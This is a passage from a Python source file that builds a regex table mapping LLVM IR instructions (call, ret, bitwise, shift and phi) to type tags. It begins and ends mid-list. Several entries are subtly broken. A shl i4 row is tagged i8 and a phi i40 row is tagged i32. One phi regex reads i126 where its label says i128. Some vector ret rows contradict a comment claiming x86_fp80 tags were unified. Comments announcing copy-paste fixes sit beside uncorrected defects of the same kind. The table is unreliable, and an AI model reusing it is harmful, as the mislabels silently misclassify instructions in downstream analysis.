['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128\* .*', 'i128* operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1\*\* .*', 'i1** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2\*\* .*', 'i2** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4\*\* .*', 'i4** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8\*\* .*', 'i8** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16\*\* .*', 'i16** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32\*\* .*', 'i32** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64\*\* .*', 'i64** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128\*\* .*', 'i128** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80 .*', 'float operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float .*', 'float operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double .*', 'double operation',
'floating point operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80\* .*', 'float* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float\* .*', 'float* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double\* .*', 'double* operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*x86_fp80\*\* .*', 'float** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*float\*\* .*', 'float** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*double\*\* .*', 'double** operation',
'floating point* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*%".*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*opaque.*', 'struct/class op',
'struct/class op'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i1> .*', '<d x i1> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i2> .*', '<d x i2> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i4> .*', '<d x i4> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i8> .*', '<d x i8> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i16> .*', '<d x i16> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i32> .*', '<d x i32> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i64> .*', '<d x i64> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i128> .*', '<d x i128> operation',
'<d x int> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x x86_fp80> .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x float> .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x double> .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i1>\* .*', '<d x i1>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i2>\* .*', '<d x i2>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i4>\* .*', '<d x i4>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i8>\* .*', '<d x i8>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i16>\* .*', '<d x i16>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i32>\* .*', '<d x i32>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i64>\* .*', '<d x i64>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x i128>\* .*', '<d x i128>* operation',
'<d x int>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x x86_fp80>\* .*',
'<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x float>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i1\] .*', '[d x i1] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i2\] .*', '[d x i2] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i4\] .*', '[d x i4] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i8\] .*', '[d x i8] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i16\] .*', '[d x i16] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i32\] .*', '[d x i32] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i64\] .*', '[d x i64] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x i128\] .*', '[d x i128] operation',
'[d x int] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x x86_fp80\] .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x float\] .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*\[\d+ x double\] .*', '[d x double] operation',
'[d x floating point] operation'],
['ret i1 .*', 'i1 operation', 'int operation'],
['ret i2 .*', 'i2 operation', 'int operation'],
['ret i4 .*', 'i4 operation', 'int operation'],
['ret i8 .*', 'i8 operation', 'int operation'],
['ret i16 .*', 'i16 operation', 'int operation'],
['ret i32 .*', 'i32 operation', 'int operation'],
['ret i64 .*', 'i64 operation', 'int operation'],
['ret i128 .*', 'i128 operation', 'int operation'],
['ret i1\* .*', 'i1* operation', 'int* operation'],
['ret i2\* .*', 'i2* operation', 'int* operation'],
['ret i4\* .*', 'i4* operation', 'int* operation'],
['ret i8\* .*', 'i8* operation', 'int* operation'],
['ret i16\* .*', 'i16* operation', 'int* operation'],
['ret i32\* .*', 'i32* operation', 'int* operation'],
['ret i64\* .*', 'i64* operation', 'int* operation'],
['ret i128\* .*', 'i128* operation', 'int* operation'],
# Consistency fix: the define/call sections tag x86_fp80 as 'float operation' /
# 'float* operation'; the ret section alone said 'x86_fp80 operation'. Unified on
# 'float' so downstream grouping by fine-grained tag treats all sections alike.
# NOTE(review): if downstream consumers key on the old 'x86_fp80 operation'
# string, confirm before shipping.
['ret x86_fp80 .*', 'float operation', 'floating point operation'],
['ret float .*', 'float operation', 'floating point operation'],
['ret double .*', 'double operation', 'floating point operation'],
['ret x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['ret float\* .*', 'float* operation', 'floating point* operation'],
['ret double\* .*', 'double* operation', 'floating point* operation'],
['ret %".*', 'struct/class op', 'struct/class op'],
['ret <%.*', 'struct/class op', 'struct/class op'],
['ret <?{.*', 'struct/class op', 'struct/class op'],
['ret opaque.*', 'struct/class op', 'struct/class op'],
['ret <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['ret <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['ret <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['ret <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['ret <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['ret <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['ret <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['ret <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['ret <\d+ x x86_fp80> .*', '<d x x86_fp80> operation', '<d x floating point> operation'],
['ret <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['ret <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['ret <\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['ret <\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['ret <\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['ret <\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['ret <\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['ret <\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['ret <\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['ret <\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['ret <\d+ x x86_fp80>\* .*', '<d x x86_fp80>* operation', '<d x floating point>* operation'],
['ret <\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['ret <\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['ret \[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['ret \[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['ret \[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['ret \[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['ret \[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['ret \[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['ret \[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['ret \[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['ret \[\d+ x x86_fp80\] .*', '[d x x86_fp80] operation', '[d x floating point] operation'],
['ret \[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['ret \[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
["<%ID> = and i1 .*", 'i1 operation', 'int operation'],
["<%ID> = and <\d+ x i1> .*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = and i2 .*", 'i2 operation', 'int operation'],
["<%ID> = and <\d+ x i2> .*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = and i4 .*", 'i4 operation', 'int operation'],
["<%ID> = and <\d+ x i4> .*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = and i8 .*", 'i8 operation', 'int operation'],
["<%ID> = and <\d+ x i8> .*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = and i16 .*", 'i16 operation', 'int operation'],
["<%ID> = and <\d+ x i16> .*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = and i24 .*", 'i24 operation', 'int operation'],
["<%ID> = and <\d+ x i24> .*", '<d x i24> operation', '<d x int> operation'],
["<%ID> = and i32 .*", 'i32 operation', 'int operation'],
["<%ID> = and <\d+ x i32> .*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = and i40 .*", 'i40 operation', 'int operation'],
["<%ID> = and <\d+ x i40> .*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = and i64 .*", 'i64 operation', 'int operation'],
["<%ID> = and <\d+ x i64> .*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = and i128 .*", 'i128 operation', 'int operation'],
["<%ID> = and <\d+ x i128> .*", '<d x i128> operation', '<d x int> operation'],
["<%ID> = or i1 .*", 'i1 operation', 'int operation'],
["<%ID> = or <\d+ x i1> .*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = or i2 .*", 'i2 operation', 'int operation'],
["<%ID> = or <\d+ x i2> .*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = or i4 .*", 'i4 operation', 'int operation'],
["<%ID> = or <\d+ x i4> .*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = or i8 .*", 'i8 operation', 'int operation'],
["<%ID> = or <\d+ x i8> .*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = or i16 .*", 'i16 operation', 'int operation'],
["<%ID> = or <\d+ x i16> .*", '<d x i16> operation', '<d x int> operation'],
["<%ID> = or i24 .*", 'i24 operation', 'int operation'],
["<%ID> = or <\d+ x i24> .*", '<d x i24> operation', '<d x int> operation'],
["<%ID> = or i32 .*", 'i32 operation', 'int operation'],
["<%ID> = or <\d+ x i32> .*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = or i40 .*", 'i40 operation', 'int operation'],
["<%ID> = or <\d+ x i40> .*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = or i64 .*", 'i64 operation', 'int operation'],
["<%ID> = or <\d+ x i64> .*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = or i128 .*", 'i128 operation', 'int operation'],
["<%ID> = or <\d+ x i128> .*", '<d x i128> operation', '<d x int> operation'],
["<%ID> = xor i1 .*", 'i1 operation', 'int operation'],
["<%ID> = xor <\d+ x i1>.*", '<d x i1> operation', '<d x int> operation'],
["<%ID> = xor i4 .*", 'i4 operation', 'int operation'],
["<%ID> = xor <\d+ x i2>.*", '<d x i2> operation', '<d x int> operation'],
["<%ID> = xor i2 .*", 'i2 operation', 'int operation'],
["<%ID> = xor <\d+ x i4>.*", '<d x i4> operation', '<d x int> operation'],
["<%ID> = xor i8 .*", 'i8 operation', 'int operation'],
["<%ID> = xor <\d+ x i8>.*", '<d x i8> operation', '<d x int> operation'],
["<%ID> = xor i16 .*", 'i16 operation', 'int operation'],
["<%ID> = xor <\d+ x i16>.*", '<d x i16> operation', '<d x int> operation'],
# Fixed copy-paste defect: the i24 xor rows were mislabeled 'i16 operation' /
# '<d x i16> operation'; every other i24 row in this table tags as i24.
["<%ID> = xor i24 .*", 'i24 operation', 'int operation'],
["<%ID> = xor <\d+ x i24>.*", '<d x i24> operation', '<d x int> operation'],
["<%ID> = xor i32 .*", 'i32 operation', 'int operation'],
["<%ID> = xor <\d+ x i32>.*", '<d x i32> operation', '<d x int> operation'],
["<%ID> = xor i40 .*", 'i40 operation', 'int operation'],
["<%ID> = xor <\d+ x i40>.*", '<d x i40> operation', '<d x int> operation'],
["<%ID> = xor i64 .*", 'i64 operation', 'int operation'],
["<%ID> = xor <\d+ x i64>.*", '<d x i64> operation', '<d x int> operation'],
["<%ID> = xor i128 .*", 'i128 operation', 'int operation'],
["<%ID> = xor <\d+ x i128>.*", '<d x i128> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i4 .*', 'i8 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = shl ' + any_of(opt_addsubmul) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = ashr ' + any_of(opt_usdiv) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i24 .*', 'i24 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i24> .*', '<d x i24> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?i256 .*', 'i256 operation', 'int operation'],
['<%ID> = lshr ' + any_of(opt_usdiv) + '?<\d+ x i256> .*', '<d x i256> operation', '<d x int> operation'],
['<%ID> = phi i1 .*', 'i1 operation', 'int operation'],
['<%ID> = phi <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i1\]\* .*', '[d x i1]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i1\]\*\* .*', '[d x i1]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i1\]\*\*\* .*', '[d x i1]*** operation', '[d x int]*** operation'],
['<%ID> = phi i2 .*', 'i2 operation', 'int operation'],
['<%ID> = phi <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i2\]\* .*', '[d x i2]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i2\]\*\* .*', '[d x i2]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i2\]\*\*\* .*', '[d x i2]*** operation', '[d x int]*** operation'],
['<%ID> = phi i4 .*', 'i4 operation', 'int operation'],
['<%ID> = phi <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i4\]\* .*', '[d x i4]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i4\]\*\* .*', '[d x i4]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i4\]\*\*\* .*', '[d x i4]*** operation', '[d x int]*** operation'],
['<%ID> = phi i8 .*', 'i8 operation', 'int operation'],
['<%ID> = phi <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
# Fixed copy-paste defect: the [d x i8] phi rows were mislabeled '[d x i4]…';
# the fine-grained tag now matches the i8 regexes, as in every sibling group.
['<%ID> = phi \[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i8\]\* .*', '[d x i8]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i8\]\*\* .*', '[d x i8]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i8\]\*\*\* .*', '[d x i8]*** operation', '[d x int]*** operation'],
['<%ID> = phi i16 .*', 'i16 operation', 'int operation'],
['<%ID> = phi <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i16\]\* .*', '[d x i16]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i16\]\*\* .*', '[d x i16]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i16\]\*\*\* .*', '[d x i16]*** operation', '[d x int]*** operation'],
['<%ID> = phi i32 .*', 'i32 operation', 'int operation'],
['<%ID> = phi <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i32\]\* .*', '[d x i32]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i32\]\*\* .*', '[d x i32]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i32\]\*\*\* .*', '[d x i32]*** operation', '[d x int]*** operation'],
['<%ID> = phi i40 .*', 'i32 operation', 'int operation'],
['<%ID> = phi <\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i40\*> .*', '<d x i40*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i40>\* .*', '<d x i40>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i40\] .*', '[d x i40] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i40\]\* .*', '[d x i40]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i40\]\*\* .*', '[d x i40]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i40\]\*\*\* .*', '[d x i40]*** operation', '[d x int]*** operation'],
['<%ID> = phi i64 .*', 'i64 operation', 'int operation'],
['<%ID> = phi <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i64\]\* .*', '[d x i64]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i64\]\*\* .*', '[d x i64]** operation', '[d x int]** operation'],
['<%ID> = phi \[\d+ x i64\]\*\*\* .*', '[d x i64]*** operation', '[d x int]*** operation'],
['<%ID> = phi i128 .*', 'i128 operation', 'int operation'],
['<%ID> = phi <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = phi <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = phi <\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = phi \[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = phi \[\d+ x i128\]\* .*', '[d x i128]* operation', '[d x int]* operation'],
['<%ID> = phi \[\d+ x i126\]\*\* .*', '[d x i128]** operation', '[d x int]** operation'],
